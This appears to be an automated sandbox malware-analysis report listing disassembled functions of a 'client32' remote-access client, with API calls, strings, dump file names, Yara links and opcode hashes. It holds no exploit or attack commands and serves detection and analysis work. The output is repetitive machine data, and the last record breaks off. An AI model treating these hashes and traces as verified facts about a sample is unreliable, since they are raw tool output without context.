                                                                              • Instruction Fuzzy Hash: 01F030B1B4131A6BE7009FAADC41B55BB98EB48664F008037A71C87680D6B5A8108FE4
                                                                              Function 1103B606 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 198COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0000045F,00000000,?,00000000), ref: 1103B75F
                                                                                • Part of subcall function 110CC330: GetCurrentThreadId.KERNEL32 ref: 110CC339
                                                                                • Part of subcall function 110CEEB0: CreateDialogParamA.USER32(00000000,?,1112E709,110CC170,00000000), ref: 110CEF41
                                                                                • Part of subcall function 110CEEB0: GetLastError.KERNEL32 ref: 110CF099
                                                                                • Part of subcall function 110CEEB0: wsprintfA.USER32 ref: 110CF0C8
                                                                              • GetWindowTextA.USER32(?,?,000000C8), ref: 1103B81E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: CreateCurrentDialogErrorFileLastModuleNameParamTextThreadWindowwsprintf
                                                                              • String ID: Survey$pcicl32.dll$toastImageAndText.png
                                                                              • API String ID: 2477883239-2305317391
                                                                              • Opcode ID: 2f90f4586e8a144a85dc65e248e3d6049d5ed08b354996f0881b37baed7ae7a3
                                                                              • Instruction ID: a37ee32854b15c041e991ad0c80392c526a8d8f631297bf945f8db0117e793ba
                                                                              • Opcode Fuzzy Hash: 2f90f4586e8a144a85dc65e248e3d6049d5ed08b354996f0881b37baed7ae7a3
                                                                              • Instruction Fuzzy Hash: 3871E27590465A9FE709CF64C8D8FEAB7F5EB48308F1485A9D5198B381EB30E944CB50
                                                                              Function 110773B0 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 111COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • MapWindowPoints.USER32(?,00000000,?,00000002), ref: 110773FB
                                                                                • Part of subcall function 11076740: DeferWindowPos.USER32(8B000EB5,00000000,BEE85BC0,33CD335E,?,00000000,33CD335E,11077496), ref: 11076783
                                                                              • EqualRect.USER32(?,?), ref: 1107740C
                                                                              • SetWindowPos.USER32(00000000,00000000,?,33CD335E,BEE85BC0,8B000EB5,00000014,?,?,?,?,?,110775EA,00000000,?), ref: 11077466
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 11077442
                                                                              • m_hWnd, xrefs: 11077447
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Window$DeferEqualPointsRect
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 2754115966-2830328467
                                                                              • Opcode ID: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                              • Instruction ID: 7762f9a6a2ed7d341f2943c2e7d232384b1531e6a197bbc7c1a3da1ffe608ad4
                                                                              • Opcode Fuzzy Hash: b6d19f504f75df2a93f1157cb60ab9b52a693478c141313c6b39b5393ddf6f55
                                                                              • Instruction Fuzzy Hash: 74414B74A006099FDB14CF98C885EAABBF5FF48704F108569EA55AB344DB70A800CFA4
                                                                              Function 11049690 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 106COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • _malloc.LIBCMT ref: 1104971C
                                                                              • _free.LIBCMT ref: 11049779
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • CLTCONN.CPP, xrefs: 11049708
                                                                              • ReleaseSmartcardDevice called, xrefs: 110496BD
                                                                              • idata->pSmartcardDevice == theSmartcardDevice, xrefs: 1104970D
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ErrorExitLastMessageProcess_free_mallocwsprintf
                                                                              • String ID: CLTCONN.CPP$ReleaseSmartcardDevice called$idata->pSmartcardDevice == theSmartcardDevice
                                                                              • API String ID: 3300666597-3188990991
                                                                              • Opcode ID: bbd08ce13b15e0d7af9443266ff705f80d5dbbc8ca5254b04d83a5beabc5d6aa
                                                                              • Instruction ID: e35be207329a9a02e71ffc0183289b31f5ea9fbf546850573bb4cc18e029b419
                                                                              • Opcode Fuzzy Hash: bbd08ce13b15e0d7af9443266ff705f80d5dbbc8ca5254b04d83a5beabc5d6aa
                                                                              • Instruction Fuzzy Hash: D041AEB5A01611AFD704CF98D880EAAFBE4FB48328F6142BDE52997350E730A940CB95
                                                                              Function 110BD470 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 65windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetMenu.USER32(?), ref: 110BD4A4
                                                                              • GetSubMenu.USER32(00000000,00000002), ref: 110BD4E5
                                                                              • DrawMenuBar.USER32(?), ref: 110BD50D
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              • e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h, xrefs: 110BD48E
                                                                              • m_hWnd, xrefs: 110BD493
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Menu$DrawErrorExitLastMessageProcesswsprintf
                                                                              • String ID: e:\nsmsrc\nsm\1210\1210f\ctl32\wndclass.h$m_hWnd
                                                                              • API String ID: 381722633-2830328467
                                                                              • Opcode ID: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
                                                                              • Instruction ID: 2ed85e2a360b3d02c99ae53d45e4f65cdbccb9b7267b746ab424cefae630bdcb
                                                                              • Opcode Fuzzy Hash: 0cf4c9e9231e7294a34ea0469e29db66948a84948ca199a1ba082523d671b7b5
                                                                              • Instruction Fuzzy Hash: 9B1151BAE00219AFCB04DFA5C894CAFF7B9BF49308B00457EE11697254DB74AD05CB94
                                                                              Function 1102D750 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 51COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetVersion.KERNEL32(?,1113A2AB,00000001,00000001,Audio,HookDirectSound,00000000,00000000), ref: 1102D75C
                                                                              • InterlockedIncrement.KERNEL32(111EE418), ref: 1102D799
                                                                              • InterlockedDecrement.KERNEL32(111EE418), ref: 1102D7C0
                                                                              Strings
                                                                              • EnableAudioHook(%d, %d), gCount=%d, xrefs: 1102D77F
                                                                              • SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum, xrefs: 1102D7A6, 1102D7CC
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Interlocked$DecrementIncrementVersion
                                                                              • String ID: EnableAudioHook(%d, %d), gCount=%d$SYSTEM\CurrentControlSet\Hardware Profiles\Current\System\CurrentControlSet\Enum
                                                                              • API String ID: 1284810544-229394064
                                                                              • Opcode ID: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                              • Instruction ID: 926408d456050aac1ce0bfa7cc5ec849c80561d93592d3bffa921dc6a50aec96
                                                                              • Opcode Fuzzy Hash: fe3dc48e698ffd4a8d7334cc8b8c209b51da527230acf53cf6ffc60aeaae577d
                                                                              • Instruction Fuzzy Hash: 8801DB3AE425A956E70299D56C84F9DB7E9BF8162DFC00071FD2DD2A04F725A84043F1
                                                                              Function 11093410 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 44registrywindowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • GetClassInfoA.USER32(1109350C,NSMClassList,?), ref: 11093424
                                                                              • LoadIconA.USER32(1109350C,00002716), ref: 11093456
                                                                              • LoadCursorA.USER32(00000000,00007F00), ref: 11093465
                                                                              • RegisterClassA.USER32(?), ref: 11093483
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: ClassLoad$CursorIconInfoRegister
                                                                              • String ID: NSMClassList
                                                                              • API String ID: 2883182437-2474587545
                                                                              • Opcode ID: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                              • Instruction ID: fe778f9fdd97d031227fa6c3481e124fd7af1bb38caa6574b8637058aa02c9a3
                                                                              • Opcode Fuzzy Hash: ed1d21c8b0e5febffb489e055e1c54f1fef417e553f3d38ad2266ee313231f99
                                                                              • Instruction Fuzzy Hash: D2015AB1D4522DABCB00CF9A99489EEFBFCEF98315F00415BE424F3240D7B556518BA5
                                                                              Function 11145660 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 44COMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadStringA.USER32(00000000,00000000,?,11112FE6), ref: 11145678
                                                                              • wsprintfA.USER32 ref: 1114568E
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: LoadStringwsprintf
                                                                              • String ID: #%d$..\ctl32\util.cpp$i < cchBuf
                                                                              • API String ID: 104907563-3240211118
                                                                              • Opcode ID: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                              • Instruction ID: 8140d2e7eee7513769b3ba4dad54de8c0dbe44583bb89c450ccda0d540df1705
                                                                              • Opcode Fuzzy Hash: 188e66dcb4f495cccd276ddbe85c9828130f8f7e32c029e7730bc87656a10fbf
                                                                              • Instruction Fuzzy Hash: 09F0F6BAA002267BDA008A99EC85DDFFB5CDF4469C7404025F908C7600EA30E800C7A9
                                                                              Function 11145450 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 33libraryloaderCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,11037F05), ref: 11145463
                                                                              • GetProcAddress.KERNEL32(00000000,GetUserDefaultUILanguage), ref: 11145475
                                                                              • FreeLibrary.KERNEL32(00000000,?,11037F05), ref: 11145485
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Library$AddressFreeLoadProc
                                                                              • String ID: GetUserDefaultUILanguage$kernel32.dll
                                                                              • API String ID: 145871493-545709139
                                                                              • Opcode ID: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                              • Instruction ID: e6235b5ae6f1dfca5c3043155b5dfa22c054f7606e96d7ad1ec578fde494cc77
                                                                              • Opcode Fuzzy Hash: d9714682fd572e4dd61365fd2dfa7814b888b2e8bab1e0a3a5dbf5644fcdd9a2
                                                                              • Instruction Fuzzy Hash: A1F0A7317021744FE3568AB69F84AAEFAD5EB81B7AB190135E430CAA98E73488408765
                                                                              Function 110ED0D0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 30windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • IsWindow.USER32(00000000), ref: 110ED0D9
                                                                              • SendMessageA.USER32(00000000,0000045B,11020C43,00000000), ref: 110ED10D
                                                                              • SendMessageA.USER32(00000000,00000445,00000000,04000000), ref: 110ED11C
                                                                                • Part of subcall function 11029A70: GetLastError.KERNEL32(?,00000000,?), ref: 11029A8C
                                                                                • Part of subcall function 11029A70: wsprintfA.USER32 ref: 11029AD7
                                                                                • Part of subcall function 11029A70: MessageBoxA.USER32(00000000,?,Client32,00000000), ref: 11029B13
                                                                                • Part of subcall function 11029A70: ExitProcess.KERNEL32 ref: 11029B29
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: Message$Send$ErrorExitLastProcessWindowwsprintf
                                                                              • String ID: ..\CTL32\NSWin32.cpp$IsWindow(hRich)
                                                                              • API String ID: 2446111109-1196874063
                                                                              • Opcode ID: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                              • Instruction ID: de22b858d700e942c4608c09a96d83abbd875fbcce216c0436bbd94e05821714
                                                                              • Opcode Fuzzy Hash: 93f24dbc4e032974f58e80ca0bca6baec86c89681a163379e751775f02966cce
                                                                              • Instruction Fuzzy Hash: 75E0D82978027837D52176926C0AFDF7B5CCB85A55F058021FB15BB0C1D560730146ED
                                                                              Function 11017420 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 26windowCOMMON
                                                                              Download Yara Rule
                                                                              APIs
                                                                              • FindWindowA.USER32(IPTip_Main_Window,00000000), ref: 11017428
                                                                              • GetWindowLongA.USER32(00000000,000000F0), ref: 11017437
                                                                              • PostMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 11017458
                                                                              • SendMessageA.USER32(00000000,00000112,0000F060,00000000), ref: 1101746B
                                                                              Strings
                                                                              Memory Dump Source
                                                                              • Source File: 00000004.00000002.3403939531.0000000011001000.00000020.00000001.01000000.00000007.sdmp, Offset: 11000000, based on PE: true
                                                                              • Associated: 00000004.00000002.3403921570.0000000011000000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404050484.0000000011194000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404087109.00000000111E2000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404125914.00000000111F1000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000111F7000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001125D000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.0000000011288000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001129E000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112AD000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112B4000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.00000000112DF000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              • Associated: 00000004.00000002.3404164360.000000001132B000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                              Joe Sandbox IDA Plugin
                                                                              • Snapshot File: hcaresult_4_2_11000000_client32.jbxd
                                                                              Yara matches
                                                                              Similarity
                                                                              • API ID: MessageWindow$FindLongPostSend
                                                                              • String ID: IPTip_Main_Window
                                                                              • API String ID: 3445528842-293399287
                                                                              • Opcode ID: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
                                                                              • Instruction ID: 34ac11834c9c2e389a15be58e88483fc622eca852c0d3e073bf1a838df65f62f
                                                                              • Opcode Fuzzy Hash: 00a8c747fde22ab102a93d32433fce56b25fb468ef9c10acfd2dcd85990a41f8
